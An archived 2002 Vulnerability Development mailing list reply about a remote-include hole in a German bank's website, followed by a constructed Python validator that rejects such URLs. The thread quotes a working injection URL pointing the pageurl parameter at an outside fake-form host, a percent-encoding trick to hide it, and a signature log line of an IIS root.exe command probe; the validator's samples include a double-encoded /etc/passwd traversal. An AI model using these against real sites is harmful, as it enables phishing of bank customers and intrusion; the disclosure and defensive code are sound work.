Vulnerability Development mailing list archives
Re: security issue at hypovereins bank
From: Dominik Birk <dominik () code-foundation de>
Date: Fri, 05 Apr 2002 00:51:05 +0200
At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
> hello
good evening hnz
> I found this security issue on the German hypovereins bank.
I'm from Germany and there was a gap like this in the hypovereinsbank site a few months ago.
> They were informed 3 months ago; still nothing has changed. The security hole will allow an attacker to include his own forms in the website. This will give him an option to collect sensitive information. It is a home banking system!
I think you can call this security hole CSS (cross-site-scripting). At this point I would like to refer to the paper by Obscure:
http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm
The German version is at http://www.code-foundation.de/archiv/form_attack.htm
> Take a look at this (long) URL:
> http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
> Now it is possible to change the pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu part to something like pageurl=http://www.evol.org/fake_form.php, or try:
> http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de
> So it is possible to include everything in this webpage. The attacker could obscure the URL in a form like pageurl=h%74t%70%3A%2Fw%77w%77............ so the user will not notice that the included form is not from the original server.
Yes, you are right. This is a really bad security hole, and in my opinion it is negligent to leave such a hole open. The Hypovereinsbank is a great bank in Germany.
> It opens a port to a new form of social hacking and data grabbing.
ACK. I'm very astonished by the negligence of several system admins.
> greetings hnz g
Sincerely
Dominik Birk
--
http://www.code-foundation.de
217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET /MSADC/root.exe?/c+dir
Microsoft? Where do you want to surf today?
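The thread describes a template-include parameter (pageurl) that accepts an arbitrary, possibly percent-encoded, external URL. As an added example that is not part of the thread and not the bank's own code, here is the kind of server-side check that closes this class of hole: decode the parameter to a canonical form, then allow only site-local template paths. It assumes, hypothetically, that templates live under /pub/ and end in .jsp.

```python
"""Constructed example: validate a template-include parameter so that it
can only ever name a site-local template, never a remote or encoded URL."""
from urllib.parse import unquote
import posixpath

ALLOWED_PREFIX = "/pub/"   # assumption: all includable templates sit under /pub/
MAX_DECODE_ROUNDS = 3      # bounded loop so double/triple-encoded input is unwrapped


def canonical_pageurl(raw: str) -> str:
    """Percent-decode until the value stops changing, so an obscured scheme
    such as h%74t%70%3A%2F... is seen as plain 'http:/' by the checks."""
    value = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_safe_pageurl(raw: str) -> bool:
    """Return True only for an absolute, site-local path under ALLOWED_PREFIX."""
    path = canonical_pageurl(raw)
    # Any scheme ('http:', 'javascript:'), protocol-relative '//host' or
    # backslash trickery is rejected outright; local template paths need none.
    if ":" in path or path.startswith("//") or "\\" in path:
        return False
    # Must be absolute within the site; relative paths are ambiguous.
    if not path.startswith("/"):
        return False
    # Collapse '..' segments before the prefix check so /pub/../x cannot escape.
    normalised = posixpath.normpath(path)
    if not normalised.startswith(ALLOWED_PREFIX):
        return False
    # Restrict to the template file type the include mechanism actually serves.
    return normalised.endswith(".jsp")


if __name__ == "__main__":
    # Constructed sample values, including the forms mentioned in the thread.
    samples = [
        "%2Fpub%2Fio%2Fkarr%2F28100.jsp",           # legitimate local template
        "http://www.google.de",                     # remote include
        "h%74t%70%3A%2Fw%77w%77.example.org/x.php",  # percent-obscured scheme
        "%252Fpub%252F..%252Fetc%252Fpasswd",       # double-encoded traversal
    ]
    for s in samples:
        print(f"{s!r:50} -> {'allow' if is_safe_pageurl(s) else 'reject'}")
```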
Current thread:
- security issue at hypovereins bank hnz geeratz[room23] (Apr 05)
- Re: security issue at hypovereins bank Dominik Birk (Apr 05)
- <Possible follow-ups>
- Re: security issue at hypovereins bank Carlos Heller (Apr 07)